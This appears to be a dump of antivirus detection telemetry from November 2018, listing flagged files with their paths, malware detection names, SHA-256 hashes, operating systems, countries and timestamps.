  Row(detection=Row(filename='avscan-20181102-054214-05ca4d6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054214-05CA4D6D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052442-92a9a8c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052442-92A9A8C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061315-5acfef73', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061315-5ACFEF73', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055039-32998347', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055039-32998347', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055552-ed79b359', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055552-ED79B359', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061009-ec0d49ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061009-EC0D49AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053044-6a9ffb18', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053044-6A9FFB18', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055628-027fb73d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055628-027FB73D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051601-5bf82015', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051601-5BF82015', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052907-3077e26c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052907-3077E26C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054717-ba0b9714', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054717-BA0B9714', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060053-a0e20d92', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060053-A0E20D92', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061705-e3e8e919', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061705-E3E8E919', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061757-031c511d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061757-031C511D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053523-1087bc7c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053523-1087BC7C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051820-af155d04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051820-AF155D04', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054035-caca5a74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054035-CACA5A74', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051651-79d7cad8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051651-79D7CAD8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T20:26:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052600-c118632c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052600-C118632C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054808-d8d22f4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054808-D8D22F4A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054405-47d0e281', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054405-47D0E281', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055145-59c56c4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055145-59C56C4B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062451-f998187e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062451-F998187E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051450-31c7a046', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051450-31C7A046', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051110-ae6c04e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051110-AE6C04E4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:03:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051954-e6d9e718', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051954-E6D9E718', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060501-3483dc6c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060501-3483DC6C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051947-e2c7ad93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051947-E2C7AD93', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054336-36c45bd6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054336-36C45BD6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055201-63c9a1b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055201-63C9A1B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='textures.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL10\\TEXTURES\\TEXTURES.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='86d96f4cab9f48678a6db82857c8292533a5dcf4b6f6dab988a65a001ca6a561', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055835-4e8cb0ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055835-4E8CB0AC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T09:28:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053415-e812ffe1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053415-E812FFE1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051422-20c9942b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051422-20C9942B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053707-4ec05a67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053707-4EC05A67', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055921-69b3c43d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055921-69B3C43D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052028-fb36a696', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052028-FB36A696', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051135-bd90ee6e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051135-BD90EE6E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='geosmisc.exe', filepath='E:\\DCIM\\gEOSMISC.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-01T11:47:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154623-609be6a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154623-609BE6A1', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:46:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:02:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hira.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\LPA\\PERSIAPAN AUDIT\\HIRA\\HIRA.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='4125af41e9dc7a34b1f9cc0ff234b62e1e3c649c8d65eb4fc2427efd1e9a1152', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhb73d', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHB73D', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:42:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154525-56cf8f42', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154525-56CF8F42', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:45:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setuparp.exe', filepath='\\\\SERVER-GOLD\\HOMEZ\\SUPERMARKET\\NONFOOD\\NONFOOD [SIL&DJU]\\SILMI\\MISILSS EVENT\\Corel\\CORELDRAW GRAPHICS SUITE X7\\Setup\\SetupARP.exe', filesize=2652000, name='W32/Sality.AT.#M1.#R1'), hash='4cb7c731ae70c5c30918d5f22ed251e627af3be6dfe79691d1fe752c70f8dd54', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-01T14:12:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='media.bat', filepath='C:\\Users\\X\\Recorded TV\\Sample Media\\Media.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:30:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155539-3e507624', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155539-3E507624', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:14:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155734-d1b04b01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155734-D1B04B01', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:12:51Z'), dt=datetime.date(2018, 11, 1)),
